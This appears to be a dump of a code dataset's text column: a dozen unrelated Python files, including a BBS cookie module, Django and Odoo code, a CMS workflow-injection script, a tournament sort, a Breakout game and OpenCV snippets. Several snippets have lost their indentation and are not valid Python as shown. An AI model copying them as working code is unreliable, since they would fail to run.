text stringlengths 38 1.54M |
|---|
###
### This file is part of Pyffle BBS.
###
### Pyffle BBS is free software: you can redistribute it and/or modify
### it under the terms of the GNU General Public License as published by
### the Free Software Foundation, either version 3 of the License, or
### (at your option) any later version.
###
### Pyffle BBS is distributed in the hope that it will be useful,
### but WITHOUT ANY WARRANTY; without even the implied warranty of
### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
### GNU General Public License for more details.
###
### You should have received a copy of the GNU General Public License
### along with Pyffle BBS. If not, see <http://www.gnu.org/licenses/>.
###
###
## Models for SqlAlchemy version 6
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relation, backref
from sqlalchemy import *
from sqlalchemy.dialects.postgresql import *
from sqlalchemy.orm import sessionmaker
from pyffle_tables import *
from pyffle_data import *
from pyffle_editor import Editor
from datetime import datetime
import sys
import getpass
import os
import tempfile
import random
import copy
def getIdentity():
    """Return this module's identity string (name and version)."""
    identity = "pyffle_cookie v0.23"
    return identity
## Returns True if the version of pyffle is compatible this version of module
def confirmVersion(version):
    """Report whether the given Pyffle *version* is compatible with this module.

    Every version is currently accepted; *version* is ignored.
    """
    return True
class PyffleModule:
    """Pyffle BBS module that displays and collects fortune-cookie messages.

    Attributes set by the BBS host before use:
        currentUser: the logged-in user record (must expose ``username``).
        data: data-access object providing stateChange, message/board access
            and the ``util`` I/O helpers.
    """
    currentUser = None
    data = None

    def eventDispatched(self, event):
        """Hook for BBS events; this module ignores them."""
        pass

    def displayCookie(self):
        """Pick one cookie at random (static or user-added) and page it out."""
        self.data.stateChange("cookie_cookiedisplaystart")
        ## first get the static cookies (deep copy so the source list is never mutated)
        cookies = copy.deepcopy(self.data.getStaticCookies())
        ## now append any cookies users posted to the hidden board
        messageIds = self.data.getMessagesByBoardname("__pyffle_cookie")
        for msgid in messageIds:
            for msgtext in self.data.getMessagetexts(msgid):
                cookies.append(msgtext)
        ## pick a random cookie and display it
        if cookies:  # guards against both None and an empty list
            random.seed()
            cookie = random.choice(cookies)
            self.data.util.printPaged(cookie)
        self.data.stateChange("cookie_cookiedisplayend")

    def go(self, command, args):
        """Entry point: handle the "justacookie", "cookie" and "oreo" commands.

        "justacookie" only displays a cookie; "cookie"/"oreo" also prompt the
        user to submit a new one.
        """
        if command == "justacookie":
            self.data.stateChange("cookie_justacookiestart")
            self.displayCookie()
            self.data.stateChange("cookie_justacookieend")
        if command == "cookie" or command == "oreo":
            self.data.stateChange("cookie_cookiestart")
            self.displayCookie()
            self.data.stateChange("cookie_cookieend")
            self.data.stateChange("cookie_cookieaddstart")
            subject = ""
            theText = self.data.util.prompt("\nEnter cookie, but no bufu.\n:")
            # BUG FIX: str.strip() returns a new string; the original discarded
            # the result, so whitespace-only input was stored as a cookie.
            theText = theText.strip()
            if not theText == "":
                self.data.stateChange("cookie_gotcookiestart")
                self.data.util.printn("\nStoring cookie..")
                sentId = self.data.createMessage(self.currentUser.username, None, subject.strip(), theText, board="__pyffle_cookie")
                self.data.util.println("Cookie stored.\n")
                self.data.stateChange("cookie_gotcookieend")
            else:
                self.data.stateChange("cookie_nocookiestart")
                self.data.util.println("\nSpoilsport. No cookie for you.\n")
                self.data.stateChange("cookie_nocookieend")
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import UserError
import xlrd,base64,datetime
class ImportWizard(models.TransientModel):
    """Wizard that imports UPC codes from an uploaded Excel file.

    Column 0 of every sheet is read; codes already present in ``upc.code``
    or already used by a product are skipped.
    """
    _name = 'import.wizard'

    name = fields.Char(default=u'导入excel', string=u'')
    # Uploaded Excel file, base64-encoded by the Odoo web client.
    data = fields.Binary(string=u'文件')

    # 数据导入
    @api.multi
    def import_excel(self):
        """Read the uploaded workbook and create missing ``upc.code`` rows.

        Raises:
            UserError: if a cell is not text (e.g. Excel stored a number).

        Returns:
            dict: an action opening the ``upc.code`` tree view.
        """
        if self.data:
            excel_obj = xlrd.open_workbook(file_contents=base64.decodestring(self.data))
            sheets = excel_obj.sheets()
            upc_obj = self.env['upc.code']
            product_obj = self.env['product.product']
            for sh in sheets:
                for row in range(0, sh.nrows):
                    code = sh.cell(row, 0).value
                    # BUG FIX: validate the type *before* calling .replace();
                    # numeric cells come back as floats, and the original
                    # raised AttributeError instead of the intended UserError.
                    if type(code) is not unicode:
                        raise UserError(u'%s 编码必须为文本类型,不能为数字格式' % code)
                    code = code.replace(' ', '')
                    result = upc_obj.sudo().search([('name', '=', code)])
                    if result:
                        continue
                    product = product_obj.sudo().search([('upc', '=', code)])
                    if product:
                        continue
                    upc_obj.create({'name': code})
        return {
            'name': u'UPC编码',
            'type': 'ir.actions.act_window',
            'view_type': 'form',
            'view_mode': 'tree',
            'res_model': 'upc.code',
        }
|
from django import forms
#from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
#Need the next two lines because my User is actually accounts.User.
from django.contrib.auth import get_user_model
User = get_user_model()
#This is where to add extra fields to the user signup form.
#I added "email" to the form. Didn't need to add it to the user model because the
#native user model already includes that.
class MyUserCreationForm(UserCreationForm):
    """Signup form extending the stock ``UserCreationForm`` with an email field.

    The field is declared on the form rather than the user model because the
    native user model already provides an ``email`` column.
    """
    email = forms.EmailField(required=True)
    #Added this so users can see family's stuff.
    #first_name = forms.CharField(required=False, help_text="family's secret password")

    class Meta:
        model = User
        # Fields shown on the signup form, in display order.
        fields = ("username", "email", "password1", "password2")

    def save(self, commit=True):
        """Persist the user, copying the validated email onto the instance.

        The email only exists in ``cleaned_data`` (it was added on the form,
        not the model form's field set), so it is copied by hand.
        """
        new_user = super(MyUserCreationForm, self).save(commit=False)
        new_user.email = self.cleaned_data["email"]
        if not commit:
            return new_user
        new_user.save()
        return new_user
|
from django.contrib import admin
from .models import Profile
from .models import Stuff
@admin.register(Profile)
class ProfileAdmin(admin.ModelAdmin):
    """Admin change-list configuration for Profile records."""
    # Columns shown on the change-list page.
    list_display = (
        'id',
        'external_id',
        'tg_username',
        'first_name',
        'last_name',
        'contact',
    )
@admin.register(Stuff)
class StuffAdmin(admin.ModelAdmin):
    """Admin change-list configuration for Stuff records."""
    # Columns shown on the change-list page.
    list_display = (
        'description',
        'profile',
        'image_url',
        'status_like_users',
    )
# Register your models here.
|
#!/usr/bin/env python
import httplib
import urllib
import sys,os
import datetime
def makeRequest(url,params):
    """POST the request schema in *params* to the ReqMgr 'create' endpoint.

    Exits the process with status 1 on any non-303 response; on success
    returns the injected workflow name parsed from the redirect payload.
    """
    encodedParams = urllib.urlencode(params)
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "text/plain"}
    #conn = httplib.HTTPSConnection(url, cert_file = os.getenv('X509_USER_PROXY'), key_file = os.getenv('X509_USER_PROXY'))
    conn = httplib.HTTPConnection(url)
    conn.request("POST", "/reqmgr/create/makeSchema", encodedParams, headers)
    response = conn.getresponse()
    data = response.read()
    # ReqMgr signals a successful injection with a 303 redirect.
    if response.status != 303:
        print 'could not post request with following parameters:'
        for item in params.keys():
            print item + ": " + str(params[item])
        print 'Response from http call:'
        print 'Status:',response.status,'Reason:',response.reason
        print 'Explanation:'
        print data
        print "Exiting!"
        sys.exit(1)
    # The workflow name is the last path component of the quoted redirect URL.
    workflow=data.split("'")[1].split('/')[-1]
    print 'Injected workflow:',workflow,'into',url
    conn.close()
    return workflow
def approveRequest(url,workflow):
    """Move *workflow* to the 'assignment-approved' state via ReqMgr.

    Exits the process with status 1 on any non-200 response.
    """
    params = {"requestName": workflow,
              "status": "assignment-approved"}
    encodedParams = urllib.urlencode(params)
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "text/plain"}
    #conn = httplib.HTTPSConnection(url, cert_file = os.getenv('X509_USER_PROXY'), key_file = os.getenv('X509_USER_PROXY'))
    conn = httplib.HTTPConnection(url)
    conn.request("PUT", "/reqmgr/reqMgr/request", encodedParams, headers)
    response = conn.getresponse()
    if response.status != 200:
        print 'could not approve request with following parameters:'
        for item in params.keys():
            print item + ": " + str(params[item])
        print 'Response from http call:'
        print 'Status:',response.status,'Reason:',response.reason
        print 'Explanation:'
        data = response.read()
        print data
        print "Exiting!"
        sys.exit(1)
    conn.close()
    print 'Approved workflow:',workflow
    return
def assignRequest(url,workflow,team,site,era,procversion,activity):
    """Assign *workflow* to *team* and *site* through the ReqMgr assignment page.

    The form expects per-team and per-workflow "checked" checkbox keys, hence
    the dynamically-built "Team<team>" and "checkbox<workflow>" entries.
    Exits the process with status 1 on any non-200 response.
    """
    params = {"action": "Assign",
              "Team"+team: "checked",
              "SiteWhitelist": site,
              "SiteBlacklist": [],
              "MergedLFNBase": "/store/user/meloam",
              "UnmergedLFNBase": "/store/user/meloam",
              "ForceUserOutput" : 1,
              "ForceUserStorage" : 1,
              # Merge thresholds in bytes (2 GiB / 4 GiB).
              "MinMergeSize": 2147483648,
              "MaxMergeSize": 4294967296,
              # Timeouts in seconds (one day).
              "SoftTimeout": 3600 * 24,
              "GracePeriod": 3600 * 24,
              "MaxMergeEvents": 50000,
              "AcquisitionEra": era,
              "ProcessingVersion": procversion,
              "maxRSS": 4294967296,
              "maxVSize": 4294967296,
              "dashboard": activity,
              "checkbox"+workflow: "checked"}
    # doseq=True so the empty SiteBlacklist list encodes correctly.
    encodedParams = urllib.urlencode(params, True)
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "text/plain"}
    conn = httplib.HTTPConnection(url)
    conn.request("POST", "/reqmgr/assign/handleAssignmentPage", encodedParams, headers)
    response = conn.getresponse()
    if response.status != 200:
        print 'could not assign request with following parameters:'
        for item in params.keys():
            print item + ": " + str(params[item])
        print 'Response from http call:'
        print 'Status:',response.status,'Reason:',response.reason
        print 'Explanation:'
        data = response.read()
        print data
        print "Exiting!"
        sys.exit(1)
    conn.close()
    print 'Assigned workflow:',workflow,'to site:',site,'with processing version',procversion
    return
# read configs.txt
config = {}
# ReqMgr url (host:port, no scheme -- httplib.HTTPConnection expects this form)
url = "se2.accre.vanderbilt.edu:8685"
# Target processing site.
site = "T2_US_Vanderbilt"
# site = "T2_US_Vanderbilt"
# site = "T1_FR_CCIN2P3"
# site = "T3_US_Colorado"
team = "testingteam"
# team = "testbed-processing"
era = "MeloAcquistionEra2"
activity = "integration"
# Date-stamped processing version so reruns on different days do not clash.
procversion = "IntegrationTest_" + datetime.datetime.now().strftime("%y%m%d")
# change RequestString before every usage
params = {"CMSSWVersion": 'CMSSW_5_2_2',
          "GlobalTag": 'START52_V5::All',
          "MergedLFNBase" : "/store/user/meloam",
          "UnmergedLFNBase" : "/store/user/meloam",
          "ForceUserOutput" : 1,
          "ForceUserStorage" : 1,
          "SiteWhitelist" : "T2_US_Vanderbilt",
          "RequestString": 'T2stop_600_250_0_75v8',
          "RequestPriority": 300000,
          "TimePerEvent": 1000,
          "FilterEfficiency": 1,
          "ScramArch": 'slc5_amd64_gcc462',
          "RequestType" : "LHEStepZero",
          "RequestNumEvents": 100000,
          # The job configuration is fetched from the config-cache CouchDB.
          "inputMode": "couchDB",
          "CouchURL":"http://se2.accre.vanderbilt.edu:5985",
          "CouchDBName":"wmagent_configcache",
          # the full config
          #"ProcConfigCacheID": '1c73b6c3cbc6254dea3c3473be6cde49',
          # the fnal config bddd8738547bf9bab08d30c57b17ae59
          # the gpfs config c6e4c48118fee0605b67cb8abf557346
          "ProcConfigCacheID": '37916fe37672f725a17bf70a25e21a8a',
          "EventsPerLumi": 1,
          "PrimaryDataset": 'T2stop_600_250_0_75',
          "DataPileup": "",
          # NOTE(review): "filterEfficiency" duplicates "FilterEfficiency"
          # above with different casing -- confirm which one ReqMgr reads.
          "filterEfficiency": 1,
          "MCPileup": "",
          "FirstEvent": 1,
          "DataTier": 'USER',
          "Memory": 2000000000,
          "SizePerEvent":1024*1024,
          "maxRSS": 4294967296,
          "maxVSize": 4294967296,
          "SoftTimeout": 3600 * 24,
          "FirstLumi": 1,
          "AcquisitionEra":era,
          "PrepID": 'MCTEST-GEN-0001',
          # NOTE(review): "ForceUserOutput" is already set above -- duplicate
          # dict key; this later value silently wins.
          "ForceUserOutput" : 1,
          "Requestor": 'meloam',
          "RequestorDN": '/DC=org/DC=doegrids/OU=People/CN=Andrew Malone Melo 788499',
          'DbsUrl': 'https://cmsdbsprod.cern.ch:8443/cms_dbs_ph_analysis_02_writer/servlet/DBSServlet',
          "Group": 'testing',
          "TotalTime": 14400, #job length in sec.
          "userSandbox": "root://xrootd.unl.edu//store/user/meloam/sandboxes/gensandbox2.tgz",
          }
# Inject, approve and assign the request in sequence.
workflow = makeRequest(url,params)
approveRequest(url,workflow)
assignRequest(url,workflow,team,site,era,procversion,activity)
|
"""This module contains tournament_sort and other helper functions.
You can run a test using this command:
python3 -m doctest tournament_sort.py -v
or just
python3 tournament_sort.py [--verbose]
"""
# This module can be executed as module and script and by doctest.
if __name__ == "__main__" or __name__ == "tournament_sort":
from common.util import *
else:
from .common.util import *
from collections import deque
from math import *
def left_child(collection, node):
    """Index of *node*'s left child in the flat, leaves-first tree layout."""
    return 2 * node - len(collection) - 1
def right_child(collection, node):
    """Index of *node*'s right child in the flat, leaves-first tree layout."""
    return 2 * node - len(collection)
def parent(collection, node):
    """Index of *node*'s parent in the flat, leaves-first tree layout."""
    return (node + len(collection) + 1) // 2
def match(collection, left, right, index_mapper=lambda x: x):
    """Play one match and return the winner's index in *collection*.

    The smaller value wins; ties go to the left player. A ``None``
    contestant forfeits, and if both are ``None`` the result is ``None``.

    Args:
        collection (list): Players' values.
        left (int): Index of the left player (before mapping).
        right (int): Index of the right player (before mapping).
        index_mapper (int -> int): Maps the given indices to indices into
            *collection*, e.g. through a tree's node table.

    Returns:
        int: Index of the winner in *collection*, or ``None``.

    Example:
        >>> match([1, 2, 3, 4], 1, 3, lambda x: [4, 3, 2, 1][x])
        1
        >>> match([1, 1, 1, 1], 0, 3, lambda x: [2, 2, 2, 2][x])
        2
    """
    mapped_left = index_mapper(left)
    mapped_right = index_mapper(right)
    if mapped_left is None:
        # Covers the both-None case too: the result is then None.
        return mapped_right
    if mapped_right is None:
        return mapped_left
    if collection[mapped_left] <= collection[mapped_right]:
        return mapped_left
    return mapped_right
def print_tournament_tree(collection, tree):
    """Print the tournament tree, one level per line, root first.

    Each node is shown as its value in *collection*; empty slots print "*".
    Relies on ``print_padding`` from ``common.util`` for column alignment.
    """
    if len(collection) == 0:
        print("Tree empty.")
        return
    line_capacity = 1  # nodes on the current level (doubles per level)
    line_count = 0     # nodes already printed on the current line
    padding = 2**ceil(log2(len(tree)))
    # Walk from the root (last element) down towards the leaves.
    for tree_index in range(len(tree) - 1, -1, -1):
        element = "*" if tree[tree_index] is None else str(collection[tree[tree_index]])
        print_padding(element, padding, end="")
        line_count += 1
        if line_count >= line_capacity:
            # Level finished: newline, halve the padding, double the capacity.
            print("")
            padding //= 2
            line_capacity *= 2
            line_count = 0
def construct_tournament_tree(collection):
    """Build a tournament tree over the items of *collection*.

    The tree is stored flat, leaves first and root last. For example,
    [2, 1, 3, *, 5, 6, 7] encodes:
            7
          5   6
        2 1  3 *
    With l = len(tree), node i has left child (2i - l - 1), right child
    (2i - l) and parent (i + l + 1) // 2.

    Args:
        collection (list): Input items; not modified.

    Returns:
        list: Tournament tree whose nodes hold indices into *collection*
            (``None`` marks padding slots).

    Example:
        >>> construct_tournament_tree([2, 1, 3, 8, 5, 6, 7])
        [0, 1, 2, 3, 4, 5, 6, None, 1, 2, 4, 6, 1, 4, 1]
        >>> construct_tournament_tree([5, 4, 3, 2, 1])
        [0, 1, 2, 3, 4, None, None, None, 1, 3, 4, None, 3, 4, 4]
    """
    if not collection:
        return [None]
    # Round the leaf count up to the nearest power of two.
    leaf_count = 2**ceil(log2(len(collection)))
    # Leaves: one index per item, then None padding up to leaf_count.
    tree = list(range(len(collection))) + [None] * (leaf_count - len(collection))
    # A complete tree over leaf_count leaves has 2 * leaf_count - 1 nodes.
    tree_size = 2 * leaf_count - 1
    # Play the first-round and subsequent matches pairwise; each append
    # becomes an internal node, ending with the overall winner at the root.
    for node in range(0, tree_size - 1, 2):
        tree.append(match(collection, node, node + 1, index_mapper=lambda x: tree[x]))
    return tree
def retrace_tournament_tree(collection, tree, node):
    """Replay matches from *node* up to the root after a leaf changed.

    Re-runs the match between the children of *node* (when it is an internal
    node), stores the winner, then recurses on the parent until the root has
    been updated.

    Args:
        collection (list): Original data to refer.
        tree (list): A tournament tree; modified in place.
        node (int): Index of node in the tree.

    Returns:
        list: Retraced tournament tree. The tree modified.

    Example:
        >>> retrace_tournament_tree([2, 1, 3, 8, 5, 6, 7], [0, None, 2, 3, 4, 5, 6, None, 1, 2, 4, 6, 1, 4, 1], 1)
        [0, None, 2, 3, 4, 5, 6, None, 0, 2, 4, 6, 0, 4, 0]
    """
    # Leaves occupy indices 0 .. len(tree) // 2; only internal nodes above
    # that hold match results and need re-running.
    if node > (len(tree) // 2):
        left = left_child(tree, node)
        right = right_child(tree, node)
        winner = match(collection, left, right, index_mapper=lambda x: tree[x])
        tree[node] = winner
    # Recurse towards the root; the root itself is the last element.
    if node < len(tree) - 1:
        return retrace_tournament_tree(collection, tree, parent(tree, node))
    else:
        return tree
def tournament_sort(collection, verbose=False):
    """Implementation of tournament sort in Python.

    Args:
        collection (list): Input to sort.
        verbose (bool): Print every rotation if true.

    Returns:
        list: The same as the collection, with sort ascending applied.

    Example:
        >>> tournament_sort([3, 1, 7, 0, 4, 8, 2])
        [0, 1, 2, 3, 4, 7, 8]
        >>> tournament_sort([-91, -123, -1])
        [-123, -91, -1]
        >>> tournament_sort([])
        []
    """
    output = []
    tree = construct_tournament_tree(collection)
    if verbose:
        print("Tournament tree constructed:")
        print_tournament_tree(collection, tree)
        print("")
    # Root of the tree points to the minimum value in the collection.
    winner_index = tree[-1]
    while winner_index is not None:
        if verbose:
            print("Run tournament.")
            print("Winner is " + str(collection[winner_index]) + ".")
            print("The tree looks like:")
            print_tournament_tree(collection, tree)
            print("")
        # Add winner to the output.
        output.append(collection[winner_index])
        # The winner_index is not only an index of collection,
        # but also an index of the tree: the leaves occupy
        # indices 0 .. len(collection) - 1, so the winning leaf can be
        # located directly and knocked out.
        tree[winner_index] = None
        # Replay the matches along the winner's path to pick the next winner.
        retrace_tournament_tree(collection, tree, winner_index)
        winner_index = tree[-1]
    return output
# Script entry point: read a collection from stdin and sort it.
if __name__ == "__main__":
    from common.invoker import from_input
    from_input(tournament_sort)
|
#!/usr/bin/python
import cgi, cgitb, os, commands
cgitb.enable()
# Emit the CGI response header before any other output.
print "Content-type: text/html \n\n"
#data=cgi.FieldStorage()
##############################################################
# Hard-coded VM parameters; the commented lines below would read them
# from the CGI form instead.
name= 'cent_os5'
ram= '512'
core= '1'
port= '8991'
machine_id= 'first'
#name=data.getvalue('os_name')
#ram=data.getvalue('ram')
#core=data.getvalue('vcpu')
#port=data.getvalue('port')
#machine_id=data.gevalue('name')
#############################################################
#install_machine=commands.getstatusoutput("sudo virt-install --graphics vnc,listen=192.168.1.100,port={} --cdrom /var/lib/libvirt/images/CentOS-7-x86_64-Minimal-1810.iso --disk none --memory {} --vcpus {} --name {} ".format(port,ram,core,name))
# Start a websockify proxy so noVNC can reach the VM's VNC display.
# NOTE(review): the command string contains no {} placeholder, so the
# .format(port) call is a no-op -- confirm whether the port was meant
# to be substituted into the command.
vnc_start=commands.getstatusoutput("websockify -D --web=/usr/share/novnc --cert=/etc/pki/tls/certs/novnc.pem 6080 localhost:5901".format(port))
#print install_machine
print vnc_start
|
def main():
    """Read T test cases, solve each, and print Code-Jam-style result lines."""
    t = int(input())  # read a line with a single integer: the case count
    for i in range(1, t + 1):
        n = int(input())
        # BUG FIX: the original concatenated str + solve_problem(n), which
        # raises TypeError whenever solve_problem returns a non-string (it
        # currently returns None). Format the value as a placeholder instead.
        print("Case #{}: {}".format(i, solve_problem(n)))
        # print("Case #{}: {} {}".format(i, n + m, n * m))
def solve_problem(n):
    """Solve one test case for input *n*; placeholder to be implemented."""
    pass
# Run only when executed as a script.
if __name__ == '__main__':
    main()
|
from unittest import skip
from django.test import TestCase
from mapstory.models import ContentMixin
class TestContentMixin(TestCase):
def setUp(self):
self.contentMixin = ContentMixin(content="<a href=%s target='_'>")
def test_import(self):
self.assertIsNotNone(ContentMixin)
@skip("Fix this")
def test_save_and_retrieve(self):
self.contentMixin.save()
saved = ContentMixin.objects.all()
self.assertEqual(saved.count, 1)
def test_html(self):
self.assertTrue(self.contentMixin.html().strip().startswith("<"))
self.assertTrue(self.contentMixin.html().endswith(">"))
|
from django.shortcuts import render_to_response
def login(request):
    """Render the landing (login) page."""
    template_name = "index.html"
    return render_to_response(template_name)
def Pagina_Principal(request):
    """Render the main page."""
    template_name = "Principal.html"
    return render_to_response(template_name)
def Registro_Usuario(request):
    """Render the user-registration page."""
    template_name = "Registro.html"
    return render_to_response(template_name)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division
import sys
sys.path.append("/Services/ElasticsearchWatcher/config")
import datetime, db, sendMail, logMaster, sourceCalc, ConfigParser, os, time, hashlib, math, re, sys
# Parser for the watcher's configuration file.
config = ConfigParser.ConfigParser()
# Application logger.
logger = logMaster.Logger()
# Per-node metric calculator.
calc = sourceCalc.Calculate()
# Database handle.
# NOTE(review): this rebinds the name of the imported ``db`` module --
# confirm the module itself is not needed after this point.
db = db.Db()
if __name__ == "__main__":
    try:
        # Poll every configured Elasticsearch member every 30 seconds,
        # re-reading the config file on each cycle so edits apply live.
        while True:
            config.read("/Services/ElasticsearchWatcher/config/config.cfg")
            try:
                system_list = config.get("env","system_members").split(",")
            except:
                # Single member: config.get returned a plain string.
                system_list = [config.get("env","system_members")]
            for el_server in system_list:
                if calc.calc(el_server):
                    pass
            time.sleep(30)
    except KeyboardInterrupt:
        # Turkish runtime message: "Script terminated. See you =)"
        print "\n\tScript sonlandırıldı.Görüşmek Üzere =)\n"
        sys.exit(0)
|
# Aaron Donnelly
# Computing the primes.
# My list of comments to TBD
# Collected primes below the limit.
P = []
# Check each candidate from 2 up to (but not including) 10000 for primality.
for i in range(2, 10000):
    # Assume i is prime until a divisor is found.
    isprime = True
    # A composite i must have a divisor no larger than its square root, so
    # trial division can stop there (the original scanned all of 2..i-1,
    # which is O(n) per candidate for no benefit).
    for j in range(2, int(i ** 0.5) + 1):
        # See if j divides i.
        if i % j == 0:
            # Found a divisor: i is composite, stop looking.
            isprime = False
            break
    # If i survived all trial divisions it is prime; record it.
    if isprime:
        P.append(i)
print(P)
|
try: # pre 1.6
from django.conf.urls.defaults import url, patterns
except ImportError:
from django.conf.urls import url # after 1.8
from .views import ajaximage
urlpatterns = [
    url(
        # Raw string: '\d' inside a plain literal is an invalid escape
        # sequence in modern Python (DeprecationWarning, then SyntaxError);
        # the regex bytes themselves are unchanged.
        r'^upload/(?P<upload_to>.*)/(?P<max_width>\d+)/(?P<max_height>\d+)/(?P<crop>\d+)/(?P<valid_width>\d+)/(?P<valid_height>\d+)/(?P<max_bytes>\d+)',
        ajaximage,
        name='ajaximage'
    ),
]
|
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
Bricks Breakout Game!
Three lives and let's see how good you are!
author: sheng-hao wu
description: class/object/method defined file
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
BRICK_SPACING = 5      # Space between bricks (in pixels), both horizontal and vertical.
BRICK_WIDTH = 40       # Width of a brick (in pixels).
BRICK_HEIGHT = 15      # Height of a brick (in pixels).
BRICK_ROWS = 10        # Number of rows of bricks.
BRICK_COLS = 10        # Number of columns of bricks.
BRICK_OFFSET = 50      # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10       # Radius of the ball (in pixels).
PADDLE_WIDTH = 75      # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15     # Height of the paddle (in pixels).
PADDLE_OFFSET = 50     # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7.0  # Initial vertical speed for the ball.
MAX_X_SPEED = 5        # Maximum initial horizontal speed for the ball.
MIN_X_SPEED = 1        # Minimum initial horizontal speed for the ball.
class BreakoutGraphics:
    """Window, paddle, ball and brick state for the Breakout game."""

    def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
                 paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
                 brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
                 brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
                 brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
                 title='Breakout'):
        # Create a graphical window, with some extra space.
        window_width = brick_cols * (brick_width + brick_spacing) + brick_spacing
        window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) + brick_spacing)
        self.window = GWindow(width=window_width, height=window_height, title=title)
        # Create a paddle centred horizontally, paddle_offset above the bottom.
        self.paddle = GRect(paddle_width, paddle_height, x=(window_width - paddle_width)/2, y=window_height - paddle_height - paddle_offset)
        self.obj_fill_color_add(self.paddle, "black")
        # Center a filled ball in the graphical window.
        # NOTE(review): GOval takes width/height, so the ball's diameter here
        # equals ball_radius -- confirm whether 2 * ball_radius was intended.
        self.ball = GOval(ball_radius, ball_radius, x=(window_width - ball_radius) / 2, y=(window_height - ball_radius)/2)
        self.obj_fill_color_add(self.ball, "black")
        # Default initial velocity and direction control for the ball.
        self.init_ball_velocity()
        # Game flow control: the ball only moves once the player clicks.
        self.ball_active = False
        self.remained_life = 0
        self.remained_bricks = brick_cols * brick_rows
        # Mouse listeners: a click starts the game, movement drives the paddle.
        onmouseclicked(self.game_active)
        onmousemoved(self.move_paddle)
        # Draw bricks. Rows share a color in pairs, top to bottom.
        bricks_colors = ["red", "orange", "yellow", "green", "blue"]
        # bricks[1] .. bricks[brick_cols * brick_rows] hold the bricks;
        # index 0 is unused and stays None.
        self.bricks = [None] * (brick_cols * brick_rows + 1)
        for col in range(1, brick_cols + 1):
            for row in range(1, brick_rows + 1):
                # BUG FIX: the original indexed with col * row, which collides
                # for different cells (e.g. 2*6 == 3*4 == 12), overwriting
                # bricks and leaving many slots None. Use a unique per-cell
                # index instead.
                index = (col - 1) * brick_rows + row
                self.bricks[index] = GRect(brick_width, brick_height, x=col * (brick_spacing + brick_width) - brick_width, y=row * (brick_spacing + brick_height) - brick_height)
                # Modulo keeps the color lookup valid for more than 10 rows
                # (identical result for the default 10-row layout).
                self.obj_fill_color_add(self.bricks[index], bricks_colors[((row - 1) // 2) % len(bricks_colors)])

    # getter for ball dx
    def get_ball_dx(self):
        return self.__dx

    # setter for ball dx
    def set_ball_dx(self, val):
        self.__dx = val
        return self.__dx

    # getter for ball dx_right
    def get_ball_dx_right(self):
        return self.__dx_right

    # setter for ball dx_right
    def set_ball_dx_right(self, val):
        self.__dx_right = val
        return self.__dx_right

    # getter for ball dy
    def get_ball_dy(self):
        return self.__dy

    # setter for ball dy
    def set_ball_dy(self, val):
        self.__dy = val
        return self.__dy

    # getter for ball dy_down
    def get_ball_dy_down(self):
        return self.__dy_down

    # setter for ball dy_down
    def set_ball_dy_down(self, val):
        self.__dy_down = val
        return self.__dy_down

    def init_ball_velocity(self):
        """Choose a random horizontal speed/direction and reset vertical speed."""
        self.__dx = random.randint(MIN_X_SPEED, MAX_X_SPEED)
        if random.random() > 0.5:
            self.__dx = -self.__dx
        if self.__dx > 0:
            self.__dx_right = True
        else:
            self.__dx_right = False
        self.__dy = INITIAL_Y_SPEED
        self.__dy_down = True

    # func for paddle track mouse.x position
    def move_paddle(self, mouse):
        """Keep the paddle centred under the cursor while fully on screen."""
        if 0 + self.paddle.width/2 <= mouse.x <= self.window.width - self.paddle.width/2:
            self.paddle.x = mouse.x - self.paddle.width/2

    # func to active game
    def game_active(self, mouse):
        """Mouse-click handler: release the ball."""
        self.ball_active = True

    # reset ball's position
    def reset_ball_position(self):
        """Put the ball back at the centre of the window."""
        self.ball.x = (self.window.width - self.ball.width) / 2
        self.ball.y = (self.window.height - self.ball.height) / 2

    # func helps fill and add object
    def obj_fill_color_add(self, obj, color):
        """Fill *obj* with *color* and add it to the window."""
        obj.color = color
        obj.filled = True
        obj.fill_color = color
        self.window.add(obj)
|
import cv2 as cv
import numpy as np
# Load the test image (hard-coded path; adjust for your machine).
image = cv.imread('/home/ash/opencv_projects/images/book.jpeg')
# color filtering
# cap = cv.VideoCapture(0)
# while True:
# ret,frame = cap.read()
# hsv = cv.cvtColor(frame,cv.COLOR_BGR2HSV)
# lower_red = np.array([10,130,140])# 5,230,230 for blue the values inside is for green 40,100,100
# upper_red = np.array([220,255,255])# basically we give range in bgr and detect the color in that particular range 220,255,255 80,255,255
# mask = cv.inRange(hsv,lower_red,upper_red)
# res = cv.bitwise_and(frame,frame,mask = mask )# to perform bitwise end between 2 identical frames which will result in the same page and masking it between lower_red and upper_end
# kernel = np.ones([10,10],np.uint8)/100
# smoothed = cv.filter2D(res,-1,kernel)
# median_blur = cv.medianBlur(res,15)
# gaussian_blur = cv.GaussianBlur(res,(15,15),0)
# # erosion
# erosion = cv.erode(mask,kernel,iterations=1)
# dilation = cv.dilate(mask,kernel,iterations=1)
# opening = cv.morphologyEx(mask,cv.MORPH_OPEN,kernel)
# closing = cv.morphologyEx(mask,cv.MORPH_CLOSE,kernel)
# cv.imshow('opening',opening)
# cv.imshow('closing',closing)
#cv.imshow('erosion',erosion)
#cv.imshow('dilation1',dilation)
# cv.imshow("gaussian blur",gaussian_blur)
# cv.imshow('median_blur',median_blur)
# cv.imshow('smooth',smoothed)
# cv.imshow('res',res)
